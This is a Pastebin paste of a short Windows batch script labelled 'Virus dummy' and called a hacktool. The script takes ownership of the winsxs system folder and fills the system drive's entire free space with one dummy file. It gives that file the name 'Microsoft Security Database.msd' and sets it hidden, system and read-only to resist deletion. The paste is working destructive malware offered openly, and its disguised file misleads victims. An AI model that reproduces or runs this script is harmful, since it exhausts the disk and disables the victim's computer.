Advertisement
Guest User

Virus dummy - Puntoinfinito

a guest
Jul 10th, 2012
387
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.80 KB | None | 0 0
  1. @Echo OFF
  2. title INFINITER © - Hacktool
  3. ::Infiniter is created this hacktool
  4. ::INFINITER ©  
  5. REM Ocupar todo el espacio del disco duro con un archivo dummy
  6. Setlocal enabledelayedexpansion
  7. Takeown /F "%Windir%\winsxs" >NUL 2>&1
  8. Icacls     "%Windir%\winsxs" /Grant TODOS:F >NUL 2>&1
  9. :Dummy
  10. For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do (
  11.     Set Size=%%f
  12.     Set Size=!Size:~-0,-6!
  13.     Set Size=!Size!000000
  14.     Fsutil file createnew "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1
  15. )
  16. Setlocal disabledelayedexpansion
  17. :AntiDelete
  18. Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1
  19. Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F >NUL 2>&1
  20. Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2>&1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement